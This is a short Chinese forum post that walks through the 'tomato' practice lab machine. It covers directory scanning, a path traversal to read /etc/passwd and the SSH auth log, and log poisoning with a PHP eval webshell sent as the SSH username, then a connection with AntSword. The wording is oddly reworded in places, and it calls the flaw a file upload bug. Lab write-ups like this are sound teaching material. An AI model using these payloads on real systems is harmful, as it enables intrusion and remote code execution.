IT评测·应用市场-qidao123.com技术社区

标题: tomato靶场通关攻略 [打印本页]

作者: 张国伟 时间: 2024-9-10 02:23
标题: tomato靶场通关攻略
1.御剑2014找到IP地点

2.dirb扫描目录

3.再次详细扫描目录

4.访问找到的目录文件

进入antibots中

5.征采一会再info.php里面发现有东西

6.这个地方貌似可以举行利用

7.查看源代码发现包罗include文件上传漏洞

8.网址后面跟?image=../../../../../../../etc/passwd

9.既然可以查看暗码文件，那我们查看一下别的文件试试

?image=../../../../../../var/log/auth.log

10.反弹shell

将一句话木马作为ssh登录的用户名，然后登陆，暗码随便输入，如许日志文件就会记录该用户登录失败的日志，而该用户的用户名就是我们的一句话木马。
ssh '<?php phpinfo();eval($_POST['sss']);?>'@172.16.1.113 -p 2211

11.蚁键毗连

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

欢迎光临 IT评测·应用市场-qidao123.com技术社区 (https://dis.qidao123.com/)